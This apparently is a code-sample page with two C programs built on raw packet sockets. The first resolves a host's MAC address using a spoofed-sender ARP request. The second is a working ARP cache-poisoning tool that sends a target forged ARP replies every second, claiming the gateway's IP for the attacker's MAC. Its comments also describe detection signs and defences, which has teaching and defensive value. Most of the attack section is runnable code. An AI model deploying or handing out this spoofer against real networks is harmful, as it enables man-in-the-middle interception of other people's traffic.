Ejemplo n.º 1
Archivo: arp.c Proyecto: Xeslaro/mp
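/*
 * Resolve the MAC address of the IPv4 host given in z[1] by sending an ARP
 * request on net_if and printing the sender hardware address of the first
 * ARP frame whose sender IP matches.
 *
 * The request is built by mk_arp_request_packet() (defined elsewhere) from a
 * fixed MAC cc:cc:cc:cc:cc:cc and the address 1.1.1.1, presumably as the
 * sender fields -- confirm against that helper. Because those are not the
 * interface's own addresses, the interface is put into promiscuous mode so
 * the answer can still be observed.
 *
 * Returns 0 after printing the MAC, 1 when no target address was supplied.
 * alarm(2) arms SIGALRM; what happens on expiry is decided by alarm_handler,
 * which is not visible here.
 */
int main(int c, char *z[])
{
	/* Byte offsets inside an Ethernet + ARP (IPv4) frame. */
	enum {
		OFF_ETHERTYPE = 12,
		OFF_SENDER_MAC = 22,
		OFF_SENDER_IP = 28,
		MIN_ARP_FRAME = 32	/* last byte read below is offset 31 */
	};

	/* z[1] is dereferenced below; without this check a missing argument
	 * hands a NULL pointer to conv_ip(). */
	if (c < 2) {
		fprintf(stderr, "usage: %s <target-ip>\n", c > 0 ? z[0] : "arp");
		return 1;
	}

	errn1(packet_socket = socket(AF_PACKET, SOCK_RAW, rev2(ETH_P_ALL)), "open socket error");

	/* Zero both addresses first: bind() and the sender would otherwise be
	 * handed indeterminate sll_hatype/sll_pkttype/sll_protocol bytes. */
	struct sockaddr_ll	sa_ll_b = {0}, sa_ll_s = {0};

	sa_ll_b.sll_family = AF_PACKET;
	sa_ll_b.sll_protocol = rev2(ETH_P_ALL);
	sa_ll_b.sll_ifindex = get_ifindex(packet_socket, net_if);

	sa_ll_s.sll_family = AF_PACKET;
	sa_ll_s.sll_halen = 0x06;
	sa_ll_s.sll_ifindex = get_ifindex(packet_socket, net_if);
	/* memcpy, not strcpy: a hardware address is binary data, not a string. */
	memcpy(sa_ll_s.sll_addr, "\xff\xff\xff\xff\xff\xff", 6);

	ok0(bind(packet_socket, (struct sockaddr*)&sa_ll_b, sizeof sa_ll_b), "bind error");

	char	msg[1500+14];
	int	len = mk_arp_request_packet(msg, "\xcc\xcc\xcc\xcc\xcc\xcc", conv_ip("1.1.1.1"), conv_ip(z[1]));

	/* Hand the request to the sender thread. msg stays untouched from here
	 * on; received frames go into a separate buffer so the thread never
	 * transmits bytes that recvfrom() has just written. */
	semi	a;
	a.socket = packet_socket;
	a.len = len;
	a.msg = msg;
	a.sa_ll = &sa_ll_s;

	pthread_t	thread_info;
	ok0(sem_init(&sem_info, 0, 0), "sem_init error");
	ok0(pthread_create(&thread_info, NULL, send_eth_packet, (void*)&a), "pthread_create error");

	/* f records set_promiscuous()'s result and gates the restore below. */
	f = set_promiscuous(packet_socket, net_if);
	signal(SIGALRM, alarm_handler);
	alarm(2);

	char	rx[1500+14];
	while (1) {
		ok0(sem_post(&sem_info), "sem_post error");

		ssize_t	got = recvfrom(packet_socket, rx, sizeof rx, 0, NULL, NULL);
		errn1(got, "recvfrom error");

		/* A short frame does not contain the fields inspected below;
		 * parsing it would compare against leftover bytes. */
		if (got < MIN_ARP_FRAME)
			continue;

		/* Copy the fields out instead of casting rx+12 / rx+28: those
		 * offsets are not suitably aligned for direct short/int loads. */
		short	ethertype;
		int	sender_ip;
		memcpy(&ethertype, rx + OFF_ETHERTYPE, sizeof ethertype);
		memcpy(&sender_ip, rx + OFF_SENDER_IP, sizeof sender_ip);

		if (ethertype == rev2(0x0806) && sender_ip == conv_ip(z[1])) {
			int	i;
			for (i=0;i<6;i++)
				printf("%.2x%c", rx[OFF_SENDER_MAC+i]&0xff, (i+1==6)?'\n':':');
			/* Do not leave the interface in promiscuous mode. */
			if (f)
				leave_promiscuous(packet_socket, net_if);
			return 0;
		}
	}
}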
Ejemplo n.º 2
/*
 * ARP cache-poisoning demonstration.
 *
 * Usage: <prog> <interface> <ip_target>, run as root.
 *
 * Steps, as written below:
 *   1. Broadcast one ARP request for argv[2] using this host's real MAC and
 *      IP (obtained through get_ifi(), defined elsewhere).
 *   2. Read exactly one frame from the raw socket.
 *   3. If that frame is an ARP reply whose sender IP is argv[2], send the
 *      target, once per second and without end, an ARP reply whose sender IP
 *      is GATEWAY and whose sender MAC is still this host's MAC.
 *
 * What this produces on the wire, for anyone writing detections: unsolicited
 * ARP replies at a fixed one-second cadence, unicast to one host, in which
 * the gateway's IP address is paired with a MAC that is not the gateway's.
 * Switch-level ARP inspection or a static ARP entry for the gateway on the
 * host are the usual controls against it.
 *
 * NOTE(review): the spoofing loop only ends when sendto() fails, so the
 * free()/close() at the bottom are reached only when step 3 is skipped, and
 * nothing in this function takes the interface out of promiscuous mode.
 */
int main(int argc, char *argv[])
{
    if(argc != 3){
            fprintf (stderr, "usage: %s <interface> <ip_target>\n", argv[0]);
            /* NOTE(review): a usage error exits with status 0 (success). */
            exit(0);
    }
    /* Require both the effective and the real UID to be 0. */
    if (geteuid() || getuid()) {
        printf("ERROR: You must be root to use this utility\n");
        exit(1);
    }

    int sfd, len;
    u_char *mac;
    /* 60 bytes; the recvfrom() below is bounded by sizeof(arp) instead, which
     * is only the same size if struct arp_pkt has no padding (14 + 28 + 18). */
    char recv_buf[60];
    struct in_addr ip_addr;
    /* NOTE(review): never zeroed; only sll_family and sll_ifindex are set
     * before it is passed to sendto(). */
    struct sockaddr_ll sl;
    /* One Ethernet frame carrying an ARP payload, plus 18 bytes of padding. */
    struct arp_pkt{
        struct ether_header eh;
        struct ether_arp ea;
        u_char padding[18];
    }arp;

    /* Open a raw packet socket that sees every protocol (ETH_P_ALL). */
    if((sfd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0){
        perror("socket");
        exit(2);
    }

    /* Put the interface into promiscuous mode; the helper is defined
     * elsewhere and its return value is ignored here. */
    set_promiscuous(sfd, argv[1]);

    /* Fetch this host's MAC and IP for the interface.
     * NOTE(review): malloc() is not checked, the cast is to char * while mac
     * is u_char *, and the failure path below exits 0 without free(mac). */
    mac = (char *)malloc(MAC_LEN);
    if(get_ifi(sfd, argv[1], mac, &ip_addr)){
        close(sfd);
        exit(0);
    }

    memset(&arp, 0, sizeof(arp));
    /* Fill in the Ethernet header: broadcast destination, own MAC as source. */
    memcpy(arp.eh.ether_dhost, MAC_BCAST_ADDR, MAC_LEN);
    memcpy(arp.eh.ether_shost, mac, MAC_LEN);
    arp.eh.ether_type = htons(ETHERTYPE_ARP);
    /* Fill in the ARP payload: a request from this host asking for argv[2]. */
    arp.ea.arp_hrd = htons(ARPHRD_ETHER);
    arp.ea.arp_pro = htons(ETHERTYPE_IP);
    arp.ea.arp_hln = MAC_LEN;
    arp.ea.arp_pln = IP_LEN;
    arp.ea.arp_op = htons(ARPOP_REQUEST);
    memcpy(arp.ea.arp_sha, mac, MAC_LEN);
    memcpy(arp.ea.arp_spa, &ip_addr, IP_LEN);
    memset(&arp.ea.arp_tha, 0, MAC_LEN);
    /* NOTE(review): inet_aton()'s result is not checked, so a malformed
     * argv[2] leaves the target address as the zeros written by memset. */
    inet_aton(argv[2], arp.ea.arp_tpa);
    memset(&arp.padding, 0, sizeof(arp.padding));
    
    sl.sll_family = PF_PACKET;
    sl.sll_ifindex = if_nametoindex(argv[1]);

    if((len = sendto(sfd, &arp, sizeof(arp), 0, (struct sockaddr*)&sl, sizeof(sl))) <= 0 ){
        perror("sendto request");
        close(sfd);
        exit(1);
    }
    printf("Broadcast arp request of %s, %d bytes be sent\n", argv[2], len);
    memset(recv_buf, 0, sizeof(recv_buf));
    /* Reads a single frame. The socket was opened with ETH_P_ALL, so this may
     * be any frame on the interface, not necessarily the ARP answer. */
    if((len = recvfrom(sfd, recv_buf, sizeof(arp), 0, NULL, 0)) <= 0 ){
        perror("recvfrom reply");
        close(sfd);
        exit(1);
    }
    printf("Recv arp reply of %s, %d bytes be sent\n", argv[2], len);

    /* Accept the frame only if the ARP opcode (offset 20) is 2 = reply and
     * the sender IP (offset 28) equals the address that was asked for.
     * Offset 22 is the sender MAC. len is not compared against these offsets;
     * a short frame is read against the zeros left by the memset above.
     * NOTE(review): __be16 is not declared anywhere in view -- confirm the
     * header that provides it; the cast is also an unaligned-safe load only
     * because offset 20 happens to be even. */
    if( ntohs(*(__be16 *)(recv_buf + 20))==2 && !memcmp(arp.ea.arp_tpa, recv_buf + 28, 4) ){
        /* Reuse the request buffer as a forged reply: addressed to the
         * target's MAC, sender IP replaced by GATEWAY (a macro defined
         * elsewhere, passed to inet_aton so presumably dotted-quad text),
         * sender MAC left as this host's MAC from the request. */
        memcpy(arp.eh.ether_dhost, (u_char *)(recv_buf + 22), MAC_LEN);
        arp.ea.arp_op = htons(ARPOP_REPLY);
        inet_aton(GATEWAY, arp.ea.arp_spa);
        memcpy(arp.ea.arp_tha, (u_char *)(recv_buf + 22), MAC_LEN);

        /* Resend the forged reply every second; exits only on send failure. */
        while(1){
            if((len = sendto(sfd, &arp, sizeof(arp), 0, (struct sockaddr*)&sl, sizeof(sl))) <= 0 ){
                perror("sendto request");
                close(sfd);
                exit(1);
            }
            printf("Send arp spoofing to %s, %d bytes be sent\n", argv[2], len);
            sleep(1);
        }   
    }

    /* Reached only when the received frame did not match the check above. */
    free(mac);
    close(sfd);
    return 0;
}